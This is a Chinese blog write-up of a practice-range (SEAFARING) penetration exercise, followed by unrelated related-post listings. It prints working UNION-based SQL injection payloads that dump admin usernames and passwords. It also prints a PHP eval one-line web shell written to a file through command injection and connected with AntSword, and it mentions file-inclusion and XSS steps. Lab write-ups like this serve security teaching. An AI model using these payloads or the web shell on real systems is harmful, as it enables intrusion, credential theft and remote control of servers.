SEAFARING靶场渗透

于 2024-09-13 18:48:07 发布
阅读量208 收藏 2
点赞数 5
文章标签: 数据库 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kknifek/article/details/142217431
版权

一.SQL注入漏洞

1.输入id=1 --+ 下方出现数据说明闭合成功

2.测试得出数据库有三列

 

3.三处都是回显点

 

4.联合查询爆出库名

 

5.查表名

?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='test'--+ 

 

6.查字段名

?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='test' and table_name='admin'--+ 

 

7. 查出用户名和密码

?id=-1 union select 1,group_concat(user_name,'~',user_pass),3 from admin--+ 

 

二.文件上传漏洞

1.用我们刚才获取的用户名和密码登录后发现可以上传文件

 

2.上传一句话木马进去

 

3.将文件地址拼接到网址后进行访问

 

4.使用蚁剑连接

 

三.命令执行漏洞

1.网址下方的输入框提示我们可以执行命令

 

2.尝试输入ls有效

 

3.借助这个漏洞我们写一句话木马到888.php 并访问

echo '<?php @eval($_POST[cmd]);?>' > 888.php 

 

4.复制地址用蚁剑连接

 

四.文件包含漏洞

1.修改刚才传入的888.php内容为phpinfo();重新上传访问后发现远程文件包含是关闭的,只能使用本地文件包含

 

2.访问php文件复制地址蚁剑连连接即可

 

五.XSS漏洞

在登录框中测试有没有XSS漏洞,成功弹窗

 

 

桶将军T
关注
求助 MOR-Tales of seafaring
fsjcondingle的博客
02-09 371
题目大意: 小科经常会听爷爷给他讲述年轻时航海的故事,从一个港口开始航行,经过许多水路,最后到达了另一个港口,每次都能最高效地完成航行。 听多了,小科就开始怀疑爷爷是在吹牛,于是他打算写一个程序,验证爷爷谷故事中的航行能不能完成 故事场景中,有n个港口,m条水路、每条水路连接着2个港口,每个航行故事中会询问两个港口间是否有长度为d的路径(不一定是简单路径),即可以重复走一条边。 输入格式 第一行有三个整数n、m和k(2<=n<=5000, 1<=m<=5000, 1&l
BZOJ3417: Poi2013 Tales of seafaring
commonc的博客
05-31 979
题目大意:给n个点m条边无向图,每次询问两个点之间是否有长度为d的路径(不一定是简单路径)   从a到b假如有长度为x的路径,那就可以往回走一步再往前走一步得到长度为x+2的路径 所以可以求出每对点之间的奇数长度最短路和偶数长度最短路,然后判断是否小于d即可 PS: 1.这题卡内存,所以必须离线之后一个点一个点的枚举起点算完之后重新利用内存 2.会有单点不与外界联通并查询这个单点自己之
seafaring靶场渗透测试
2301_81525518的博客
09-13 229
进来这里有个框尝试xss没有那咱们就来试试搜索行注入这里有东西说明闭合成功,接着就order by 有三列三个地方都有回显查看数据库这里查表发现只有两个先去看看admin先来看看列然后看用户密码,这里密码直接显示出来了。
SEAFARING靶场漏洞攻略
最新发布
2301_81881972的博客
09-13 346
>echo '' > 1.php。
seafaring靶场漏洞测试攻略
shw_yzh的博客
09-13 320
seafaring靶场漏洞测试攻略
seafaring寻找漏洞
2301_78031880的博客
09-13 231
(1)下面有一个输入框,输入ls进行查看(2)输入echo '<??>' > qxl.php 并且访问(3)写入一句话木马,并且访问蚁剑连接echo '<??>'>q.php。
bzoj3137: [Baltic2013]tracks
weixin_30454481的博客
02-23 62
炸一看好像很神仙的样子,其实就是个sb题 万年不见的1A 但是我们可以反过来想,先选一个起点到终点的联通块,然后这联通块后面相当于就能够走了,继续找联通块 然后就能发现直接相邻的脚步相同的边权为0,否则边权为1 直接bfs找最深的层就完事了 #include<cstdio> #include<iostream> #include<cstring>...
[POI2013]MOR-Tales of seafaring
weixin_30586257的博客
07-10 78
题目 思博题,发现一旦路径太长我们可以来回走最后一条边,但是这样并不能改变路径长度的奇偶性 所以求一下所有点之间奇最短路和偶最短路就好了,直接暴力\(BFS\)即可 有一个烦人的特判 代码 #include<bits/stdc++.h> #define mp std::make_pair #define re register inline int read() { ...
[POI2013] MOR-Tales of seafaring
acteu20420的专栏
09-15 159
传送门 简单题意:给n个点m条边无向图,每次询问两个点之间是否有长度为d的路径(不一定是简单路径)。即可以重复走一条边。 思路: 蛮水的叭。我们知道路径可以重复走,所以只要找到一条和d奇偶性相同的最短路,就可以做到了。 因为可以在一条边上不停来来回回,也就是在最短路上加上了一个偶数-->偶数大小任意!!!; 此处应有代码: 1 #include<bi...
gre 分类词汇,gre 分类词汇,gre 分类词汇,gre 分类词汇,
06-14
- **seafaring**:航海的,与海上旅行有关的活动。 - **piscatorial**:渔猎的,与捕鱼相关的活动。 - **hulk**:残骸,废弃或损坏严重的船只。 - **junk**:帆船,中国传统的木质帆船。 - **earing**:耳钉,一种...
【CTF解题】BCTF2018-houseofatum-Writeup题解
HBohan的博客
10-14 416
先把ld和Libc给换成题目给的 patchelf --set-interpreter ./glibc-all-in-one/libs/2.26-0ubuntu2_amd64/ld-2.26.so --replace-needed ./glibc-all-in-one/libs/2.27-3ubuntu1_amd64/libc.so.6 ./glibc-all-in-one/libs/2.26- 0ubuntu2_amd64/libc-2.26.so houseofAtum 程序分析 这里只进行一些.
中国海洋大学2022CTF校赛
web13618542420的博客
05-15 302
中国海洋大学2022校赛 质量总的来说还不错,类似于新生赛,偏简单,不过有些题还是很有趣的. http://github.com/tangzichengcc/The_Growth_Path_Of_A_CTFer_And_Pwner 题目的附件放在了我的github项目,有兴趣的朋友可以去做一下 被和谐了好像,在这个项目里 The_Growth_Path_Of_A_CTFer_And_Pwner 文章目录 中国海洋大学2022校赛 web very old php game 你比香农都牛逼 Baby
A Brief History of Humankind — 01 the cognitive revolution
qq_42347617的博客
05-17 2643
1. The Cognitive Revolution 1.1 An Animal of No Significance Word List: Word Interpretation Domain n.域 Kingdom n.界 Phylum n.门 Class n.纲 Order n.目 Family n.科 genus n.“属” 名 speci...
spring事务详细讲解-深入浅出
小电玩
09-08 487
Spring 事务是本身就是对数据库的事务的支持,没有数据库的事务 Spring 是本身无法实现事务的。Spring只提供了统一事务管理接口,具体的实现还是由各数据库自己实现。在使用 Spring 事务时,可以通过注解或编程方式将需要进行事务管理的方法和代码块标记为事务性操作,当这些操作被执行时,Spring 会负责开启时根据当前环境中设置的隔离级别,调整数据库隔离级别。
【提效工具】AI工作流的1-10个实际落地场景
万物皆有灵
09-09 1088
在这个快速发展的数字时代,人工智能(AI)正在以惊人的速度改变我们的工作方式。无论你是开发者、教育工作者还是内容创作者,AI工作流提示词助手都能为你提供无与伦比的支持。今天,我们将深入探讨,20个实际落地场景,帮助你更好地理解如何利用这些工具提升工作效率和创造力。💡。
jmeter之setUP、tearDown线程组
回家吃月饼的学习交流地
09-07 565
jmeter之setUP、tearDown线程组的使用
币安/OK现货合约量化系统APP开发
I592O929783的博客
09-08 567
后端:考虑系统需要处理大量实时数据和高频交易的特点,选择高性能的编程语言和技术框架,如Python的Django或Flask框架,Java的Spring Boot等。用户交互界面:设计直观易用的用户交互界面,包括交易界面、策略配置界面、风险管理界面等,方便用户进行交易操作、策略配置和风险管理。市场数据接入:开发市场数据接入模块,从币安等交易所或数据服务商获取实时的市场数据,包括行情数据、订单簿数据、成交数据等。前端:选择适合开发复杂界面的前端框架,如React、Vue.js等,以提供用户友好的交互界面。
问题: java.sql.SQLException:The server time zone value ‘�й���׼ʱ��‘
m0_74293254的博客
09-08 328
译文: Mybatis Plus服务器时区值“h”无法识别或表示多个时区。如果希望利用时区支持,必须配置服务器或JDBC驱动程序(通过serverTimezone配置属性)以使用更具体的时区值。出现上述问题后,一般为数据库连接的url地址配置中,没有配置时区serverTimezone=UTC或配置错误,修改下即可。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值